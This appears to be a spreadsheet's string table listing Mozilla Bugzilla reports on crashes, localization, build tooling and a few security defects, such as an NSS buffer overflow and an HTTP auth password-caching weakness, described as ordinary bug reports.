    <t>THUNDERBIRD-475852</t>
  </si>
  <si>
    <t>GMail IMAP specific archive action</t>
  </si>
  <si>
    <t>coming out of bug 451995 comment 18
with the archive feature landed from bug 451995 we need to have a different command issued when the messages selected exist in a GMail IMAP account.
Archive in the GMail IMAP is actually a delete operation as the message continues to reside in the [GMail]/All Mail folder.  The delete command in the Inbox will act exactly as the Archive method in GMail.  The delete command in a sub-folder will remove the label from the message the message still being available from All Mail.  
We should probably be handling the other actions like trash and spam differently as well.  Trash being a move to the [GMail]/Trash folder (localized - see bug 458770).  Spam being a move to the [GMail]/Spam folder.  I'll try to find other bugs for these.
http://mail.google.com/support/bin/answer.py?answer=77657&amp;ctx=sibling</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-492265</t>
  </si>
  <si>
    <t>add CCMercurialBuildFactory and CCNightlyBuildFactory subclasses to buildbotcustom</t>
  </si>
  <si>
    <t>For getting the new SeaMonkey buildbot configs for bug 485820 up and running (in http://hg.mozilla.org/users/kairo_kairo.at/bbconf-sm2/ for testing will go into buildbot-configs when ready for production) and for testing the abstractions in bug 486540 I already created comm-central factories that know about how to get the source from there.
Now that I know those work the CCMercurialBuildFactory and CCNightlyBuildFactory subclasses can move to buildbotcustom.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-270023</t>
  </si>
  <si>
    <t>DOM Node view should show namespace uri of attributes</t>
  </si>
  <si>
    <t>currently it only shows the qualified name and the value of an attribute
showing the namespace uri too would be useful (it should be at least available
in the column picker)</t>
  </si>
  <si>
    <t>CORE-119335</t>
  </si>
  <si>
    <t>nsXMLContentSerializer::AppendTextData() causes assertion in nsDependentString::Rebind()</t>
  </si>
  <si>
    <t>I've been seeing this the last few weeks with a trunk build ...
Sometimes when saving an HTML doc in composer I see several assertions like:
###!!! ASSERTION: nsDependentString must wrap only null-terminated strings: '!*a
EndPtr' file ..\..\dist/include/string\nsDependentString.h line 86
###!!! Break: at file ..\..\dist/include/string\nsDependentString.h line 86
The assertion seems to be triggered by the following code in
nsXMLContentSerializer::AppendTextData():
    if (frag-&gt;Is2b()) {
      AppendToString(nsDependentString(frag-&gt;Get2b()+aStartOffset length)
                     aStr
                     aTranslateEntities
                     aIncrColumn)
    }
    else {
      AppendToString(NS_ConvertASCIItoUCS2(frag-&gt;Get1b()+aStartOffset length)
                     aStr
                     aTranslateEntities
                     aIncrColumn)
    }
The 1b and 2b pointers in the text fragment are not null terminated so you may
want to use something other than a Dependent string or make a local copy of the
fragment contents and null terminate it before using the dependent string.
Here's the partial stack trace that shows how I'm hitting the assertion:
NTDLL! 77f7629c()
nsDebug::Assertion(const char * 0x1010ce38
??_C@_0DJ@PCFA@nsDependentString?5must?5wrap?5only@ const char * 0x1010ce7c
??_C@_09OKBI@?$CB?$CKaEndPtr?$AA@ const char * 0x1010ce00
??_C@_0CO@HHMI@?4?4?2?4?4?2dist?1include?1string?2nsDepe@ int 86) line 290 + 13
bytes
nsDependentString::Rebind(const unsigned short * 0x0613d060 const unsigned
short * 0x0613d1ba) line 86 + 34 bytes
nsDependentString::Rebind(const unsigned short * 0x0613d060 unsigned int 173)
line 96
nsDependentString::nsDependentString(const unsigned short * 0x0613d060 unsigned
int 173) line 99 + 51 bytes
nsXMLContentSerializer::AppendTextData(nsIDOMNode * 0x0613d37c int 0 int -1
nsAString &amp; {...} int 1 int 0) line 120 + 40 bytes
nsHTMLContentSerializer::AppendText(nsHTMLContentSerializer * const 0x06749670
nsIDOMText * 0x0613d37c int 0 int -1 nsAString &amp; {...}) line 161 + 31 bytes
nsDocumentEncoder::SerializeNodeStart(nsIDOMNode * 0x0613d37c int 0 int -1
nsAString &amp; {...}) line 318
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0613d37c nsAString
&amp; {...}) line 373 + 20 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0613d43c nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0613d5a0 nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0613da5c nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0613cefc nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0613b05c nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x0606406c nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x05f9f21c nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::SerializeToStringRecursive(nsIDOMNode * 0x06052d54 nsAString
&amp; {...}) line 394 + 21 bytes
nsDocumentEncoder::EncodeToString(nsDocumentEncoder * const 0x06749760
nsAString &amp; {...}) line 934 + 21 bytes
nsDocumentEncoder::EncodeToStream(nsDocumentEncoder * const 0x06749760
nsIOutputStream * 0x06749bb0) line 975 + 19 bytes
nsDocument::SaveFile(nsDocument * const 0x06052d78 nsIURI * 0x06748440 int 1
int 0 const unsigned short * 0x0674c9f0 const unsigned short * 0x016c0f84
unsigned int 258 unsigned int 4294967295) line 3450 + 44 bytes
nsEditor::SaveFile(nsEditor * const 0x05fe0d40 nsIURI * 0x06748440 int 1 int
0 const nsAString &amp; {...}) line 1009 + 104 bytes</t>
  </si>
  <si>
    <t>t_mutreja</t>
  </si>
  <si>
    <t>CORE-406904</t>
  </si>
  <si>
    <t>Crash [@ VerifySameTree] with XBL</t>
  </si>
  <si>
    <t>Created attachment 291584
testcase 1 (crashes firefox when loaded)
Loading testcase 1 triggers:
###!!! ASSERTION: SetMayHaveFrame failed?: 'mContent-&gt;MayHaveFrame()' file /Users/jruderman/trunk/mozilla/layout/generic/nsFrame.cpp line 409
frame: Text(-1) (0x2490020) style: 0x248e108 :-moz-non-element {}
###!!! ASSERTION: Wrong parent style context: 'Error' file /Users/jruderman/trunk/mozilla/layout/base/nsFrameManager.cpp line 822
Wrong parent style context: should be using:  style: 0x248e2a8 {}
Crash [@ VerifySameTree] [@ nsStyleContext::GetParent].</t>
  </si>
  <si>
    <t>CORE-386012</t>
  </si>
  <si>
    <t>Crash [@ nsTextFrameUtils::TransformText] loading png as HTML</t>
  </si>
  <si>
    <t>Created attachment 269978
keep limitLength within [0 length]
###!!! ASSERTION: Invalid offset: 'aOffset mCharCount' file
/home/karl/moz/mozilla/gfx/thebes/src/gfxSkipChars.cpp line 92
###!!! ASSERTION: Invalid offset: 'aOffset mCharCount' file
/home/karl/moz/mozilla/gfx/thebes/src/gfxSkipChars.cpp line 92
#0  0x00002aaaadae21d9 in nsTextFrameUtils::TransformText (aText=0x14fd3d8 
    aLength=4294967293 aOutput=0x7fff1b644000 aCompressWhitespace=1 
    aIncomingWhitespace=0x7fff1b63b17f  aSkipChars=0x7fff1b6393b0 
    aAnalysisFlags=0x7fff1b63960c)
    at /home/karl/moz/mozilla/layout/generic/nsTextFrameUtils.cpp:153
#1  0x00002aaaadad3b62 in BuildTextRunsScanner::BuildTextRunForFrames (
    this=0x7fff1b63ac90 aTextBuffer=0x7fff1b6397d0)
    at /home/karl/moz/mozilla/layout/generic/nsTextFrameThebes.cpp:1584
#2  0x00002aaaadad4bf4 in BuildTextRunsScanner::FlushFrames (
    this=0x7fff1b63ac90 aFlushLineBreaks=0)
    at /home/karl/moz/mozilla/layout/generic/nsTextFrameThebes.cpp:1256
#3  0x0054fffd0140fffd in ?? ()
limitLength &gt; length in nsTextFrame::Reflow.
The attached patch ignores the break from nsLineLayout::GetForcedBreakPosition if it is not within the range of interest which prevents the crash.
The patch assumes that offset &gt;= 0.  Is this a valid assumption (on a PRInt32)?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-79105</t>
  </si>
  <si>
    <t>netscape.com - my.netscape.com is using layers</t>
  </si>
  <si>
    <t>my.netscape.com is using layers.
just recently (friday this weekend?) my.netscape.com started to fail to layout 
properly.
from the console:
Javascript error:
http://my.netscape.com/js/core.js line 21: document.layers has no properties
Error was suppressed by event handler</t>
  </si>
  <si>
    <t>CALENDAR-210645</t>
  </si>
  <si>
    <t>printDialog.xul can not be localized</t>
  </si>
  <si>
    <t>Pointed by Martin Srebotnjak in newsgroup :
&gt; 5) Print active calendars: new window's title Print A Calendar string is
&gt; missing as are the following strings: Select your options below and use
&gt; OK to print Select View to Print List Selected Events</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-353938</t>
  </si>
  <si>
    <t>Update tabbrowser.properties</t>
  </si>
  <si>
    <t>CORE-838559</t>
  </si>
  <si>
    <t>Convert HTMLMenuElement to WebIDL</t>
  </si>
  <si>
    <t>amarchesini</t>
  </si>
  <si>
    <t>CORE-226278</t>
  </si>
  <si>
    <t>Password cache for http auth should remember if the site was secure</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1
Forgive me if I'm missing something but browsing through the code it appears
that the password cache for HTTP remembers realm hostname and port to
determine if it should replay a password to a site that it had seen previously.
 I believe the list should actually be realm hostname port and whether it was
a secure site.  Just because a site is on port 443 it does not mean that the
site is under SSL.   
An attacker could allow you to enter your password to your secure site then
latter during the same browsing session spoof DNS for a non-ssl version of the
same url you hit previously on the same port.  Your browser would happily send 
your password to them no SSL required.
I haven't had time to test this theory.
Reproducible: Didn't try
Steps to Reproduce:</t>
  </si>
  <si>
    <t>WEBSITES-457894</t>
  </si>
  <si>
    <t>Add Adrian Kalla's blog to planet</t>
  </si>
  <si>
    <t>I'll start to blog about Silme and other L10n related stuff I'm doing here during my internship at MoCo soon. Because of that it would be nice to have my blog on planet.m.o and/or on planet.mozinterns.net .
The address of my blog: http://adrianer.jogger.pl/
The atom feed for the Mozilla-related English category: http://adrianer.jogger.pl/atom/cat/planet-mozilla-org/</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-363871</t>
  </si>
  <si>
    <t>Update Verification script should initialize globals between runs</t>
  </si>
  <si>
    <t>Putting the newest releases (the ones that contain to= and from=) at the top of the update verification configuration file isn't a good idea without some changes to verify.sh.
The problem is that the to= and from= are globals that are set by the the newest release lines. Once they are set the older release lines don't unset them. There is logic in the script that behaves differently if the to and from variables are set.
So once it got past the newest release files it FAILs on all of the other releases.
I think the solution would be to change verify.sh to it unsets the release product platform build_id locales channel from and to variables before evaluating each line from the config file.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-461342</t>
  </si>
  <si>
    <t>Icons corrupted/missing in seamonkey.exe</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.1b2pre) Gecko/20081022 SeaMonkey/2.0a2pre
Build Identifier: Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.1b2pre) Gecko/20081022 SeaMonkey/2.0a2pre
Not a Windows system but there is the equivalent of a Start button.
When I looked at starting Seamonkey by working from that Start button the Seamonkey icons are corrupted they display as multicoloured squares.
If I look at those program objects by opening the Seamonkey Desktop folder the icons display fine.
I then looked at the icons included as resources in the seamonkey executable and found only 1 icon - the 1 used in the Seamonkey Desktop folder - to be complete and look fine the rest are either corrupt or totally black.
Having been informed that the seamonkey executable is compressed using lxlite I decmpressed the executable and then checked the icons. No problems all icons display fine.
I then compressed the (decompressed) seamonke.exe file and rechecked the icons only 1 is fine the rest are corrupt or black.
That seems to suggest that using lxlite causes the icons to become corrupt.
Reproducible: Always
Steps to Reproduce:
1. Install new copy of seamonkey V2
2. Check the icons in the seamonkey.exe: open the Properties for seamonkey.exe on the Icon page click Edit to open the icon in the editor. Working in the editor click on Form name and then use the right arrow (-&gt;) on the keyboard to look at all icons involved. You will find most black 1 corrupt and 1 that is fine
3. Use lxlite to decompress the seamonkey.exe file and then check the icons again they should all be fine.
4. Re-compress using lxlte and check the icons again - back to only 1 icon OK</t>
  </si>
  <si>
    <t>losepete</t>
  </si>
  <si>
    <t>MOZILLA.ORG-475473</t>
  </si>
  <si>
    <t>Create mozilla.dev.security.policy newsgroup</t>
  </si>
  <si>
    <t>A need has been identified to split discussion of security and CA policy from technical implementation (dev.security and dev.tech.crypto). Please great a new newsgroup/mailing list/Google Group triad called mozilla.dev.security.policy.
Thanks
Gerv</t>
  </si>
  <si>
    <t>CORE-479725</t>
  </si>
  <si>
    <t>UMR [@ nsOggDecoder::GetStatistics] nsOggDecoder::mDuration not initialized</t>
  </si>
  <si>
    <t>Created attachment 363621
Patch
Saw this with valgrind:
==47889== Conditional jump or move depends on uninitialised value(s)
==47889==    at 0x23652C6: nsOggDecoder::GetStatistics()+614 (in /src/mozilla/profile/obj-browser-opt/toolkit/library/XUL)
Simple fix.</t>
  </si>
  <si>
    <t>CORE-451673</t>
  </si>
  <si>
    <t>TM: Tracing fails for prime number generation testcase</t>
  </si>
  <si>
    <t>Created attachment 335001
Original testcase
See attached testcases.  First version was a straight translation from a flash and sliverlight version of the code.  It revealed the (thanks to bz) following issues:
1) Math.ceil is not traced
2) bool == bool not trace
So I build a second version to work around this (second testcase) and it still falls off trace.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-287187</t>
  </si>
  <si>
    <t>builds with core fonts disabled can crash [@ nsFontMetricsConstructor]</t>
  </si>
  <si>
    <t>Crashes in nsFontMetricsConstructor have shown up in talkback probably because
of bug 281402.  This is presumably because people have the pref or env var set.
 Patch coming shortly.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-412451</t>
  </si>
  <si>
    <t>Make http://euro-surveys.php5stage.mozilla.com/results/ not redirect to surveys.mozilla-europe.org/results</t>
  </si>
  <si>
    <t>http://surveys.mozilla-europe.org is the site of the Community Surveys Project. The page where the surveys' results can be retrieved is located at https://surveys.mozilla-europe.org/results/ and requires an LDAP authentication.
The project has also its space on the staging server:
http://euro-surveys.php5stage.mozilla.com/
However the analogous results page:
http://euro-surveys.php5stage.mozilla.com/results/
redirects to the production site:
https://surveys.mozilla-europe.org/results/
which make it impossible to test improvements to the results page on stage. 
Please remove the redirection if possible. The results page on the staging server doesn't need to be SSL-protected.</t>
  </si>
  <si>
    <t>SEAMONKEY-90966</t>
  </si>
  <si>
    <t>Apple using  not meshing well with Link Toolbar</t>
  </si>
  <si>
    <t>www.apple.com actually uses  elements to aid site organization. With the
Link Toolbar finally getting close to landing these can finally be used. Yay!
One of the  they provide is rel=find. Casual testing reveals this value
doesn't interface with the Link Toolbar's Search menu item.
Should we include find as a value we support for this?</t>
  </si>
  <si>
    <t>choess</t>
  </si>
  <si>
    <t>CORE-197289</t>
  </si>
  <si>
    <t>Progress meters fail to show progress remaining blank</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.4a) Gecko/20030313
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.4a) Gecko/20030313
Anywhere Mozilla uses a progress meter the bar fails to change colour to
indicate the percentage of the progress. When a file is downloaded the
percentage numbers and MBs downloaded changes. The process meter is drawn but
fails to draw the colour bar indicating the percentage of progress graphically.
The progress meter also fails when a new url is loaded. The M at the top right
hand corner of the browser will indicate that a page is being loaded.
Reproducible: Always
Steps to Reproduce:
1.Laod a new page into the browser or download a file.
Actual Results:  
The progress meter fails to be drawn. 
Expected Results:  
The colour bar for the progress meter indicating the percent of progress should
be drawn.
I first experienced this in the MacOS X build from March 12 build id 2003031211.</t>
  </si>
  <si>
    <t>pbergsagel</t>
  </si>
  <si>
    <t>TOOLKIT-297992</t>
  </si>
  <si>
    <t>Remove obsolete printing files from Winstripe theme in toolkit</t>
  </si>
  <si>
    <t>This is a followup from bug 294479.
The following files in the toolkit part of Winstripe are unused and should be
removed:
- pg-landscape.gif
- pg-landscape-small.gif
- pg-portrait.gif
- printing.css
Patch coming in a few hours.</t>
  </si>
  <si>
    <t>NSS-495634</t>
  </si>
  <si>
    <t>write overflow in nss_ckmdSessionObject_SetAttribute</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Build Identifier: 
nss_ckmdSessionObject_SetAttribute in security/nss/lib/ckfw/sessobj.c has an allocation which it does not scale by the size of the element type leading to a write overflow.  The relevant code is pasted below.
I don't know whether this is exploitable (I don't have much familiarity with the Firefox or NSS code and this was found with a code scanning tool).
BEGIN_CODE
  nssCKMDSessionObject *obj
...
  CK_ATTRIBUTE_TYPE_PTR rt
...
  rt = (CK_ATTRIBUTE_TYPE_PTR)nss_ZRealloc(obj-&gt;types (obj-&gt;n + 1))
  if( (CK_ATTRIBUTE_TYPE_PTR)NULL == rt ) {
...
  }
  obj-&gt;attributes = ra
  obj-&gt;types = rt
  obj-&gt;attributes[obj-&gt;n] = n
  obj-&gt;types[obj-&gt;n] = attribute
  obj-&gt;n++
END CODE
The call to nss_ZRealloc allocates obj-&gt;n+1 bytes instead of (obj-&gt;n+1)*sizeof(CK_ATTRIBUTE_TYPE) bytes (CK_ATTRIBUTE_TYPE is an unsigned long) so the write to obj-&gt;types[obj-&gt;n] will overflow as well as future reads and writes of obj-&gt;types.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-212110</t>
  </si>
  <si>
    <t>misc cleanup of externalhelperappservice</t>
  </si>
  <si>
    <t>attaching a patch in a second</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-454666</t>
  </si>
  <si>
    <t>Verbatim isn't localizable</t>
  </si>
  <si>
    <t>In the nav menu Verbatim should be text and the nav_logo should just be the dinosaur head.  Right now it can't be localized.</t>
  </si>
  <si>
    <t>CORE-480713</t>
  </si>
  <si>
    <t>nsDocLoader doesn't clear requests from mRequestInfoHash security UI may not report mixed content</t>
  </si>
  <si>
    <t>Created attachment 364674
v1 + mixed content tests reenable
This is cause for mixed content tests (bug 452401) intermittent failures.
nsDocLoader maps request info by request (nsIRequest) address in its mRequestInfoHash hash table. When a request address get recycled and reused for another request (not unlikely to happen) existing info for already dead request is reused.
In nsDocLoader::OnProgress there is a condition 'if (!info-&gt;mUploading &amp;&amp; (nsInt64(0) == info-&gt;mCurrentProgress) &amp;&amp; (nsInt64(0) == info-&gt;mMaxProgress))' that have to pass only when we get the first OnProgress notify from a request (i.e. when progress of a request is 0) to prevent multiple StateChange notifications to upper levels. 
When existing request info is reused the condition doesn't pass even ones.
This OnProgress notification is critical for the security UI. When it doesn't get it for a request that request got ignored by security UI and we may occasionally get fully secure state for actual mixed content page.
Solution is to remove the request info from the hash table when we get OnStopRequest.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-300622</t>
  </si>
  <si>
    <t>bad focus and behavior after clicking tab</t>
  </si>
  <si>
    <t>This is on current Linux &amp; OS/2 trunks (e.g. 2005071103) and started somewhere
around the time bug 299454 was fixed.
To reproduce:
1-Open CZ to several channels
2-Click some channel tab other than the one for the currently displayed channel
3-Strike any alphanumeric key(s)
Actual behavior:
1-Focus is on nick button
2-CPU % for suite exectuable is upwards of 90% for many seconds possibly more
than a minute depending on system speed and other activity
3-No typed character(s) appear in input box
Expected behavior:
1-Focus is in input box
2-CPU % is normal
3-Typed character(s) appear in input box
Workaround: try to remember to hit  key after each click of a channel tab
before striking any other key</t>
  </si>
  <si>
    <t>CORE-402342</t>
  </si>
  <si>
    <t>SVG Filter feTurbulence: Minefield transposes type and stitchTiles attributes</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a9pre) Gecko/2007110212 Minefield/3.0a9pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a9pre) Gecko/2007110212 Minefield/3.0a9pre
Minefield renders the feTurbulence Filter always as turbulence even when the type is fractalNoise.
Reproducible: Always
Steps to Reproduce:
Display both files with Minefield:
http://www.w3.org/TR/SVG11/images/filters/feTurbulence.png
http://www.w3.org/TR/SVG11/images/filters/feTurbulence.svg</t>
  </si>
  <si>
    <t>no-reply-address-of-florian</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-373675</t>
  </si>
  <si>
    <t>Icon resize doesn't support alpha-transparency</t>
  </si>
  <si>
    <t>Extension icons often use alpha-transparency. However if I upload the Adblock Plus icon (http://www.mozdev.org/source/browse/~checkout~/adblockplus/src/chrome/skin/classic/adblockplus.png) it will be resized (32x32 to 32x32 :) and the result looks broken. Apparently the alpha-transparent parts have been changed to opaque using a black background. If I save the same image with a white background without any transparency and upload it everything is fine.</t>
  </si>
  <si>
    <t>TOOLKIT-513747</t>
  </si>
  <si>
    <t>[10.6] SQLite incompatibility causes crashes on Snow Leopard (Mac OS X 10.6)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.6 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.6 en-US rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Running the firefox Bash script on Mac OS X 10.6 (Snow Leopard) crashes with the following error message:
dyld: Library not loaded: /usr/lib/libsqlite3.dylib
  Referenced from: /System/Library/Frameworks/Security.framework/Versions/A/Security
  Reason: Incompatible library version: Security requires version 9.0.0 or later but libsqlite3.dylib provides version 1.0.0
This is because the shell script alters DYLD_LIBRARY_PATH such that the libsqlite3.dylib file in the Firefox directory takes precedence over the one in /usr/lib and the Firefox version is incompatible with Snow Leopard.
Executing the firefox-bin binary directly does not cause this problem since the default DYLD_LIBRARY_PATH is being used.
See http://support.mozilla.com/tiki-view_forum_thread.php?forumId=1&amp;comments_parentId=432894 for some comments about this.  It affects users trying to start the Profile Manager and Selenium-RC.
Reproducible: Always
Steps to Reproduce:
1. Install Firefox 3.5.2 on Mac OS X 10.6.
2. Open the Terminal application.
3. Run the following command:  /Applications/Firefox.app/Contents/MacOS/firefox
Actual Results:  
Fails with the following message:
dyld: Library not loaded: /usr/lib/libsqlite3.dylib
  Referenced from: /System/Library/Frameworks/Security.framework/Versions/A/Security
  Reason: Incompatible library version: Security requires version 9.0.0 or later but libsqlite3.dylib provides version 1.0.0
Expected Results:  
Launches successfully.
Either a newer version of libsqlite3.dylib must be included or maybe none at all (use the version that comes with the OS).
The problem can be worked around by manually replacing the /Applications/Firefox.app/Contents/MacOS/libsqlite3.dylib with the version in /usr/lib.</t>
  </si>
  <si>
    <t>msolnit</t>
  </si>
  <si>
    <t>CORE-399843</t>
  </si>
  <si>
    <t>ASSERTION: overflow containers out of order or bad parent and crash with -moz-column overflowing height</t>
  </si>
  <si>
    <t>Created attachment 284916
testcase
Loading the testcase triggers:
###!!! ASSERTION: overflow containers out of order or bad parent: '!(aOverflowCont-&gt;GetStateBits() &amp; NS_FRAME_IS_OVERFLOW_CONTAINER)' file /Users/jruderman/trunk/mozilla/layout/generic/nsContainerFrame.cpp line 1379
###!!! ASSERTION: Placeholder relationship should have been torn down see comments in nsPlaceholderFrame.h: '!shell-&gt;FrameManager()-&gt;GetPlaceholderFrameFor(mOutOfFlowFrame)' file /Users/jruderman/trunk/mozilla/layout/generic/nsPlaceholderFrame.cpp line 132
###!!! ASSERTION: frame was not removed from primary frame map before destruction or was readded to map after being removed: 'Not Reached' file /Users/jruderman/trunk/mozilla/layout/base/nsFrameManager.cpp line 707
###!!! ASSERTION: Dead placeholder in placeholder map: 'entry-&gt;placeholderFrame-&gt;GetOutOfFlowFrame() != (void*)0xdddddddd' file /Users/jruderman/trunk/mozilla/layout/base/nsFrameManager.cpp line 134
###!!! ASSERTION: no placeholder frame: 'nsnull != placeholderFrame' file /Users/jruderman/trunk/mozilla/layout/generic/nsHTMLReflowState.cpp line 1098
Crash at one of the following:
[@ nsIFrame::GetParent] 
[@ nsFrameManager::CaptureFrameStateFor]
[@ nsPropertyTable::PropertyList::Equals]
[@ nsFrameList::Destroy]
[@ nsFrameManager::GetPlaceholderFrameFor]
Some of the crashes look [sg:critical].</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-487071</t>
  </si>
  <si>
    <t>Personas on Thunderbird misaligns menuitem labels</t>
  </si>
  <si>
    <t>Created attachment 371275
screenshot showing problem
Personas on Thunderbird under Windows misaligns menuitems labels in the personas menu showing them too far to the left.  Submenu labels aren't misaligned but the Default label is as are labels for individual personas.  The random persona from category items are also misaligned.
These items should be aligned to the right of the vertical bar that runs from the top of the menu to the bottom about 20px to the right of the left-hand side of the menu.</t>
  </si>
  <si>
    <t>CORE-129545</t>
  </si>
  <si>
    <t>Missing JSFunction API in jsapi.h</t>
  </si>
  <si>
    <t>Brendan sent me a patch to jsapi.[hc] that OmniWeb needs in order to avoid using private JavaScript API.  Will attach patch.</t>
  </si>
  <si>
    <t>CORE-201288</t>
  </si>
  <si>
    <t>[FIXr]Can't click anchor images without alt attribute and no size set</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030408
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4b) Gecko/20030408
I can't click anchored images without alt and size indicated when I disable image.
This regression happens after 2003031908. So I suspect the Bug 83774 made this
issue.
Reproducible: Always
Steps to Reproduce:
1. Start Mozilla with new profile.
2. Open [Edit]-[Preferences...]-[Privacy &amp; Security] Category -[Images] Panel.
3. Click Do not load any images radio-button. Click OK.
4. Exit Mozilla using [File]-[Exit] and restart again.
5. Open my testcase.
Actual Results:  
Mozilla tries to display alt text but there is no alt text.
Thus you can't click anchor as you can't point image.
Expected Results:  
Anchor contains image should display broken images in case of no alt attribute.
I can see the broken image w/2003031808.</t>
  </si>
  <si>
    <t>noririty</t>
  </si>
  <si>
    <t>CORE-516772</t>
  </si>
  <si>
    <t>nsImageFrame ends up using random values for image size if mError set in imgContainer</t>
  </si>
  <si>
    <t>This is a regression from bug 435296.  I'm looking at this callstack:
#0  imgContainer::GetWidth (this=0x1679ffb0 aWidth=0xbfffa664) at /Users/bzbarsky/mozilla/css-frameconst/mozilla/modules/libpr0n/src/imgContainer.cpp:347
#1  0x11caa8e3 in nsImageFrame::UpdateIntrinsicSize (this=0x170c0f0 aImage=0x1679ffb0) at /Users/bzbarsky/mozilla/css-frameconst/mozilla/layout/generic/nsImageFrame.cpp:282
#2  0x11cab7bd in nsImageFrame::EnsureIntrinsicSize (this=0x170c0f0 aPresContext=0x12ab600) at /Users/bzbarsky/mozilla/css-frameconst/mozilla/layout/generic/nsImageFrame.cpp:649
#3  0x11caf907 in nsImageFrame::ComputeSize (this=0x170c0f0 aRenderingContext=0x167a0c30 aCBSize=@0xbfffa7c8 aAvailableWidth=66300 aMargin=@0xbfffa7c0 aBorder=@0xbfffa7b8 aPadding=@0xbfffa7b0 aShrinkWrap=1) at /Users/bzbarsky/mozilla/css-frameconst/mozilla/layout/generic/nsImageFrame.cpp:672
Now in frame 2 STATUS_SIZE_AVAILABLE is set so we assume we can get the size from the imgContainer.  but GetWidth/GetHeight actually return error and don't set the out param ever since bug 435296 landed.  That means we end up using random values (whatever was on the stack) for the image width/height.
I'm not sure whether the right fix is to change the nsImageFrame code or to change imgContainer to return the size if it has one or to change imgRequest to not claim STATUS_SIZE_AVAILABLE in this situation but _something_ needs to get changed.</t>
  </si>
  <si>
    <t>FIREFOX-387138</t>
  </si>
  <si>
    <t>immediately after instantiation (cut/paste or subscribe) livemark looks like a regular folder in some Places views</t>
  </si>
  <si>
    <t>After copy/cut then pasting a livemark sometimes the livemark looks like a regular folder (it has the folder icon) and it doesn't get the livemark icon until you switch folders.
I've seen this in both the left hand pane and the right hand pane of the bookmark organizer.
note it is a livemark.
I'm not sure if this is an existing bug or not as I have a patch for bug #378558 in my tree.</t>
  </si>
  <si>
    <t>CORE-404343</t>
  </si>
  <si>
    <t>ATK accessible hierarchy is broken</t>
  </si>
  <si>
    <t>The accessible hierarchy is acting very strange for Gecko/2007111904 Minefield/3.0b2pre .  I rarely see any subtree below the scrollpane for tabs 2 and higher.  In addition there have been occasions where Minefield is not even recognized by Accerciser.
Do the following to test:
1) Open Minefield followed by a second page.  I used google.com
2) Open Accerciser and look for the second tab.  I am not seeing any accessible children of the scrollpane.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-411844</t>
  </si>
  <si>
    <t>bmo missing fix for bug 378759 (OpenSearch definition is old)</t>
  </si>
  <si>
    <t>When we implemented support for OpenSearch in Camino we discovered that bmo was not using a valid OpenSearch definition (or rather one from an old version of the spec one that apparently IE7 also doesn't support).  This was fixed for Bugzilla tip and 3.0RC1 in bug 378759 but is missing from bmo.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-388586</t>
  </si>
  <si>
    <t>Do Firefox major update from FF1.5.0.12 -&gt; FF2.0.0.6</t>
  </si>
  <si>
    <t>I just installed 1.5.0.12 and manually checked for update.
I'm getting offered 2.0.0.4 see https://aus2.mozilla.org/update/1/Firefox/1.5.0.12/2007050813/WINNT_x86-msvc/en-US/release/update.xml 
We should be offering 2.0.0.5.</t>
  </si>
  <si>
    <t>BUGZILLA-469207</t>
  </si>
  <si>
    <t>Old chart reports crash if there is no data yet</t>
  </si>
  <si>
    <t>Created attachment 352602
patch v1
if (! @{$data{DATE}}) at line 253 in reports.cgi crashes if there is no data yet because $data{DATE} is undefined. My patch makes sure an empty arrayref is created when parsing data/mining/* headers.</t>
  </si>
